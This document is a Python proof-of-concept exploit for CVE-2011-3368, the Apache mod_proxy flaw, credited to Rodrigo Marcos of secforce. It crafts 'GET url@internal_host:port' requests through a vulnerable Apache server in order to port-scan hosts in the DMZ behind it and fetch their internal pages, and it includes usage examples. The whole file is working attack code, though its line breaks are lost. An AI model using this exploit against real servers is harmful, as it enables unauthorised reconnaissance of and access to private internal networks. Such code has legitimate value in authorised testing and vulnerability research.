#!/usr/bin/env python import socket import string import getopt, sys known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080] def send_request(url, apache_target, apache_port, internal_target, internal_port, resource): get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n" get = get + "Host: " + apache_target + "\r\n\r\n" remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remoteserver.settimeout(3) try: remoteserver.connect((apache_target, int(apache_port))) remoteserver.send(get) return remoteserver.recv(4096) except: return "" def get_banner(result): return result[string.find(result, "\r\n\r\n")+4:] def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource): print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource) for port in tested_ports: port = str(port) result = send_request(url, apache_target, apache_port, internal_target, port, resource) if string.find(result,"HTTP/1.1 200")!=-1 or \ string.find(result,"HTTP/1.1 30")!=-1 or \ string.find(result,"HTTP/1.1 502")!=-1: print "- Open port: " + port + "/TCP" print get_banner(result) elif len(result)==0: print "- Filtered port: " + port + "/TCP" else: print "- Closed port: " + port + "/TCP" def usage(): print print "CVE-2011-3368 proof of concept by Rodrigo Marcos" print "http://www.secforce.co.uk" print print "usage():" print "python apache_scan.py [options]" print print " [options]" print " -r: Remote Apache host" print " -p: Remote Apache port (default is 80)" print " -u: URL on the remote web server (default is /)" print " -d: Host in the DMZ (default is" print " -e: Port in the DMZ (enables 'single port scan')" print " -g: GET request to the host in the DMZ (default is /)" print " -h: Help page" print print "examples:" print " - Port scan of the remote host" print " python apache_scan.py -r www.example.com -u /images/test.gif" print " - Port scan of a host in the DMZ" print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local" print " - Retrieve a resource from a host in the DMZ" print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html" print def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource): print print "CVE-2011-3368 proof of concept by Rodrigo Marcos" print "http://www.secforce.co.uk" print print " [+] Target: " + apache_target print " [+] Target port: " + apache_port print " [+] Internal host: " + internal_target print " [+] Tested ports: " + str(tested_ports) print " [+] Internal resource: " + resource print def main(): global apache_target global apache_port global url global internal_target global internal_port global resource try: opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"]) except getopt.GetoptError: usage() sys.exit(2) try: for o, a in opts: if o in ("-h", "--help"): usage() sys.exit(2) if o == "-u": url=a if o == "-r": apache_target=a if o == "-p": apache_port=a if o == "-d": internal_target = a if o == "-e": internal_port=a if o == "-g": resource=a except getopt.GetoptError: usage() sys.exit(2) if apache_target == "": usage() sys.exit(2) url = "/" apache_target = "" apache_port = "80" internal_target = "" internal_port = "" resource = "/" main() if internal_port!="": tested_ports = [internal_port] else: tested_ports = known_ports scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)